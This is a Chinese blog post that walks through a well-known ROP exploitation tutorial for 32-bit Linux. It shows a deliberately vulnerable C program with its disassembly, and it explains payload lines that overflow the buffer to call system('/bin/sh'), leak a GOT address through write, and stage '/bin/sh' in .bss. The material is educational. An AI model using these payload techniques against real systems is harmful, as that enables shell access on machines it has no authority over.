一步一步学ROP之linux_x86篇

最新推荐文章于 2022-12-28 00:19:22 发布
最新推荐文章于 2022-12-28 00:19:22 发布
阅读量4.6k 收藏 2
点赞数 1
分类专栏: Android Security
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/jltxgcy/article/details/50695580
版权

   0x00

    本文仅解释说明蒸米大神一步一步学ROP之linux_x86篇,读者应先阅读这篇文章,遇到问题再来看我这篇文章。

    阅读完这两篇文章后,我们会理解ROP(返回导向编程),DEP(堆栈不可执行),ASLR(内存地址随机化),Stack Protector(栈保护),Memory Leak


   0x01

    第一个问题:为什么要构造成”A”*140+ret字符串,这个140是怎么来的呢?

    要回答这个问题,我们需要把level1.c反汇编,level1.c代码如下:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
 
void vulnerable_function() {
    char buf[128];
    read(STDIN_FILENO, buf, 256);
}
 
int main(int argc, char** argv) {
    vulnerable_function();
    write(STDOUT_FILENO, "Hello, World\n", 13);
}
    使用objdump -S level1反汇编,结果如下: 

08048404 <vulnerable_function>:
 8048404:    55                       push   %ebp
 8048405:    89 e5                    mov    %esp,%ebp
 8048407:    81 ec 98 00 00 00        sub    $0x98,%esp //esp-0x98
 804840d:    c7 44 24 08 00 01 00     movl   $0x100,0x8(%esp)//存放第三个参数256
 8048414:    00 
 8048415:    8d 85 78 ff ff ff        lea    -0x88(%ebp),%eax//存放第二个参数,buf的地址
 804841b:    89 44 24 04              mov    %eax,0x4(%esp)
 804841f:    c7 04 24 00 00 00 00     movl   $0x0,(%esp)//存放第一个参数,STDOUT_FILENO
 8048426:    e8 e5 fe ff ff           call   8048310 <read@plt>
 804842b:    c9                       leave  
 804842c:    c3                       ret   

0804842d <main>:
 804842d:    55                       push   %ebp
 804842e:    89 e5                    mov    %esp,%ebp
 8048430:    83 e4 f0                 and    $0xfffffff0,%esp
 8048433:    83 ec 10                 sub    $0x10,%esp
 8048436:    e8 c9 ff ff ff           call   8048404 <vulnerable_function>
 804843b:    c7 44 24 08 0d 00 00     movl   $0xd,0x8(%esp)
 8048442:    00 
 8048443:    c7 44 24 04 30 85 04     movl   $0x8048530,0x4(%esp)
 804844a:    08 
 804844b:    c7 04 24 01 00 00 00     movl   $0x1,(%esp)
 8048452:    e8 e9 fe ff ff           call   8048340 <write@plt>
 8048457:    c9                       leave  
 8048458:    c3                       ret    
 8048459:    90                       nop
 804845a:    90                       nop
 804845b:    90                       nop
 804845c:    90                       nop
 804845d:    90                       nop
 804845e:    90                       nop
 804845f:    90                       nop
    当main函数调用call 8048404 <vulnerable_function>,参考上面的代码注释,就形成了下图结构:



   0x02

    payload = 'A'*140 + p32(systemaddr) + p32(ret) + p32(binshaddr)这段代码是为了执行system("/bin/sh"),然后返回到ret继续执行。也就是binshaddr是system的参数,那么为什么这些写可以呢?

    我们先来看8048426: e8 e5 fe ff ff call 8048310 <read@plt>是怎么样取参数的?


    调用read后,依次向堆栈中存储了EIP和EBP,此时如果想取第一个参数,需要用ESP-8。

    同理我们就可以理解 payload = 'A'*140 + p32(systemaddr) + p32(ret) + p32(binshaddr)这句代码的含义,如下图,观察右边的小图


    这样我们就能理解为什么/bin/sh是第一个参数,为什么system("/bin/sh")执行后返回到ret了。


   0x03

    payload1 = 'a'*140 + p32(plt_write) + p32(vulfun_addr) + p32(1) +p32(got_write) + p32(4)这句话执行的函数是?

    write(STDOUT_FILENO, got_write, 3);


   0x04

    在一步一步学ROP之linux_x64篇一文中,讲到了Memory Leak,这段代码的含义是什么呢?

payload2 = 'a'*140 + p32(plt_read) + p32(pppr) + p32(0) + p32(bss_addr) + p32(8) payload2 += p32(system_addr) + p32(vulfun_addr) + p32(bss_addr)
    从标准输入读取/bin/sh到.bss段,对应的代码read(STDIN_FILENO, bss_addr, 8)。

    然后返回到pppt,执行pop pop pop ret,也就是绕过p32(0) + p32(bss_addr) + p32(8),执行system_addr,之后的流程就和原来一致了。

rop-sample.rar_.comrop_rop_rop源码下载_taobao netty
09-20
ROP技术解析与Netty应用实战》 ROP(Return-Oriented Programming,返回导向编程)是一种高级的利用技术,常用于安全领域,特别是在软件漏洞利用中。ROP允许攻击者通过跳转到现有代码片段(通常称为“gadgets”)...
一步一步ROPLinux_X86-蒸米大神
qq_43430261的博客
04-23 802
记录跟着蒸米大神一步一步ROPLinux_x86ROP的过程,在进行复现的时候,遇到了一些问题,文章中会体现出来。 0x00序 ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。虽然现在大家都在用64位的操作系统,但是想要扎实的ROP还是得从基础的x86...
一步一步 ROPlinux_x64 -level5
weixin_43489686的博客
02-02 1636
这道题是来自蒸米的一步一步ROPlinux_x64中的level5,主要考察的是中级ROP中的__libc_csu_init。 原理 __libc_csu_init这个函数是用来对libc进行初始化操作的,一般的程序都会调用libc函数,所以一般都会有这个函数。 .text:00000000004005C0 ; void _libc_csu_init(void) .text:00000000...
【逆向习记录】习《一步一步ROP_x86
卦星的专栏
01-11 1537
1.概述 通过前面三文章,习栈帧,GOT表,PLT表,接下来就可以进行漏洞利用,漏洞利用习最好的方法就是利用经典,其中经典教里面最经典的当属蒸米大神的一步一步系列 一步一步ROPlinux_x86 – 蒸米 蒸米大神的文章,是实战类型,里面有不少细节的东西,对于我这种没有基础的人来讲,如果不理解是很容易忘记的,因此进行原理上的习探索 环境:ubuntu 16.04 编译需要在原...
一步一步ROP x86Linux
zsj2102的专栏
11-16 1144
原文地址:http://drops.wooyun.org/tips/6597 0x00 序 ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。虽然现在大家都在用64位的操作系统,但是想要扎实的ROP还是得从基础的x86系统开始,但看官请不要着急,在随
一步一步ROP——shellcode和ret2libc
weixin_42390670的博客
07-23 1370
ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。虽然现在大家都在用64位的操作系统,但是想要扎实的ROP还是得从基础的x86系统开始,但看官请不要着急,在随后的教程中我们还会带来linux_x64以及android (arm)方面的ROP利用方法。 1 C...
一步一步ROP之Android ARM 32》 源码修改版之增加gadgets
06-08
一步一步ROP之Android ARM 32》是针对Android平台上的Return-Oriented Programming (ROP)技术的一本教程,旨在帮助读者深入理解并掌握如何在ARM 32位架构下利用ROP进行安全研究和逆向工程。在这个源码修改版...
Linux_G2D_开发指南1
08-04
Linux G2D 开发指南》是针对Linux系统下图形加速器G2D的详细开发手册。G2D(Graphics to Go)是用于提升图形处理性能的硬件模块,尤其在嵌入式系统中广泛应用。本文档旨在为开发者提供全面的指导,帮助他们理解和...
SploitFun Linux x86 Exploit 开发系列教程.zip
02-10
《SploitFun Linux x86 Exploit 开发系列教程》是一个深入探讨Linux x86架构下漏洞利用技术的资源集合,特别针对嵌入式Linux开发领域。本教程旨在帮助开发者和安全研究人员理解底层系统的工作原理,掌握如何发现、...
STM8_Unlock_Flash_ROP_issue_ROPCLEAR_unlock_stm8s003_stm8s103_
10-03
"ROP_CLEAR.bin"可能是执行ROP清除操作的二进制文件,用户可能需要通过特定的编程工具将其加载到微控制器的闪存中,以解除ROP保护。 "FLASH_try_reset_to_factory_defaults.sh"和"ROP_CLEAR.sh"是两个shell脚本,...
一步一步ROPlinux-x64
zsj2102的专栏
11-17 1161
0x00 序 ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。上次我们主要讨论了linux_x86ROP攻击。 一步一步ROPlinux_x86 http://drops.wooyun.org/tips/6597 在这次的教程中我们会带来上一
蒸米ROP习笔记(一步一步 ROPLinux_x86
niu_niu_的博客
04-15 2987
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想习如何使用Mar
linux内核rop姿势详解,Linux内核ROP姿势详解(二)
weixin_39983350的博客
05-02 500
前言在本教程的第1部分中,我们已经演示了如何为我们的系统(3.13.0-32内核-Ubuntu 12.04.5 LTS)找到有用的ROP gadgets用来构建一个用来提权的ROP链。我们还开发了一个易受攻击的内核驱动程序,允许任意代码执行。这部分我们将使用这个内核模块在实践中演示ROP链:提权,修复系统并干净地“退出”到用户态。以下是第1部分的ROP链的要求:执行提权的payload可以引用驻留...
linux内核rop姿势详解,linux kernel rop
weixin_36163672的博客
05-02 572
Introduction习 liunx 内核漏洞利用 rop 技术,练习一下内核 rop 链的构造到执行来完成普通用户权限提升。在一般的 ret2usr 攻击中,内核的控制流会被重定向到用户空间中包含权限提升代码的地址处:void __attribute__((regparm(3))) payload() {commit_creds(prepare_kernel_cred(0);}执行上面的代码...
攻防世界pwn题level0
Sakura给爷pwn全场
09-02 346
查壳64bit 拖进IDA f5查看伪代码 vulnerable_function中文译为脆弱函数,可疑,点进去查看vulnerable函数。 buf数组距离栈帧顶部rsp为0h,距离栈帧顶部rbp为80h,可知buf长度为0x80. 查看vulnerable函数栈 s代表save ebp,长度8个字节 r代表return address,长度8个字节,通常只要覆盖4个字节。 查看callsystem函数,代码段地址为0x400596 思路 把return address用callsystem函数
PWN基础之函数调用栈和栈溢出
weixin_46132162的博客
12-28 1606
在函数调用结束时,栈顶的函数(callee)状态被弹出,栈顶恢复到调用函数(caller)的状态函数调用栈在内存中从高地址向低地址生长,所以栈顶对应的内存地址在压栈时变小,退栈时变大。接下来vulnerable_function()函数会调用read()函数,这个时候vulnerable_function()函数为主调函数(caller function)read()函数为被调函数(callee function)read()函数 是有参数的,我们来看一看有参数的函数在函数调用栈是什么样的。
关于蒸米的一步一步ROPlinux_x86习笔记
lingyuexueai的博客
08-12 1606
写在开头:level2没有源码,所以第二个“Ret2libc – Bypass DEP 通过ret2libc绕过DEP防护”做不动……另外socat还没会用==,按照步骤输入命令后一直没反应,也不知道怎么办,所以后面的远程攻击也没法进行……于是只做了第一个Control Flow Hijack 程序流劫持 原文地址:http://jaq.alibaba.com/community/art/sh...
kali 使用Rop
最新发布
02-21
在 Kali Linux 中利用返回导向编程 (Return-Oriented Programming, ROP) 进行漏洞开发涉及多个方面。为了有效实施这一技术,理解其基本概念至关重要。 #### 准备工作环境 安装必要的工具包对于准备攻击环境非常...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值